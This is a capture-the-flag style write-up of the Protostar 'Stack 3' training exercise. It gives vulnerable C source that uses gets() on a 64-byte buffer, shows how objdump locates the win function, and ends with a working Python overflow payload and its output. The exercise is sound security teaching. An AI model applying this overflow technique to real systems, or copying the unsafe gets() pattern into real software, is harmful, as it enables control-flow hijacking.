Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
63 lines (44 sloc) 1.49 KB

Stack 3

https://exploit-exercises.com/protostar/stack3/

Goal

To call the win function. The site notes that "gdb and objdump is your friend".

Source Code

stack3.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

Exploit

It's pretty clear that we need to override the value of fp with the address of the win function, so that the program will call the win function. First, let's figure out where our win function lives. A little investigation into the objdump tool reveals that we can use the -D flag to disassemble-all. Let's try it.

Running objdump -D ./stack3 reveals a ton of output. Let's try to pipe that to grep to get any lines with win. Running objdump -D ./stack3 | grep win reveals:

08048424 <win>:

Okay, let's hope that that first thing is the address of win. Now we just need to override fp with that value. Using Python, let's print 64 'a's and then "\x08\x04\x84\x24"[::-1]. (Note: the [::-1] flips the order of those bytes, because addresses are little-endian). Thus, we see the following:

$ python -c 'print "a"*64 + "\x08\x04\x84\x24"[::-1]' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed